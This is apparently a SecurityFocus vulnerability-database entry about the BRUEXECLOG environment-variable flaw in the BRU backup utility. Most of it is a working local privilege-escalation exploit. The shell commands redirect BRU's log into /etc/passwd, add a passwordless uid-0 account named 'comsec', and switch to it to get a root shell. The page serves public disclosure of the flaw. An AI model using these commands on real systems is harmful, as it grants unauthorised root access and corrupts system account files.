BRU BRUEXECLOG Environment Variable Vulnerability

$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#


 

Privacy Statement
Copyright 2010, SecurityFocus